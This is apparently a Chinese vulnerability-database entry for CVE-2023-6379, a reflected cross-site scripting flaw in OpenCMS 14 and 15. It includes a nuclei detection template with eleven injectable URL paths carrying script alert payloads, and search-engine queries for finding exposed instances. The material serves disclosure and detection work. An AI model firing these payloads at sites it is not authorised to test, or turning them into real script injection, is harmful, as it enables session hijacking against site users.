OpenCMS 14 & 15 - Cross Site Scripting

漏洞信息

漏洞名称: OpenCMS 14 & 15 - Cross Site Scripting

漏洞编号:

  • CVE: CVE-2023-6379

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: OpenCMS是由Alkacon Software开发的一款开源内容管理系统,广泛应用于企业网站和内容管理平台。该系统提供了丰富的功能,包括内容编辑、发布和管理,支持多语言和多站点管理。由于其灵活性和强大的功能,OpenCMS在全球范围内被许多组织采用。该漏洞存在于OpenCMS的14和15版本的’Mercury’模板中,属于跨站脚本(XSS)漏洞。XSS漏洞的根源在于系统未能对用户输入进行充分的验证和过滤,导致攻击者能够注入恶意脚本。这些脚本在用户的浏览器中执行,可能导致会话劫持、敏感信息泄露或其他恶意操作。由于攻击者可以利用此漏洞在受害者的浏览器中执行任意代码,因此该漏洞对网站的安全性构成了中等程度的威胁。攻击者无需认证即可利用此漏洞,且可以通过自动化的工具进行大规模扫描和攻击。

产品厂商: Alkacon Software

产品名称: OpenCMS

影响版本: 14 <= version <= 15

搜索语法: title:”opencms” OR http.title:”opencms” OR cpe:”cpe:2.3:a:alkacon:opencms” OR /opencms/

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2023%2FCVE-2023-6379.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.18616
    epss-percentile: 0.94993
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022042abc20b1e570314f15fd86b428ac9382d57e03243f10db661faa38e076f6012022100ab68bc6291dc71fb3fc6da612331a317e655620ebd162e7c33bc156c27cd2c99:922c64590222798bb761d5b6d8e72950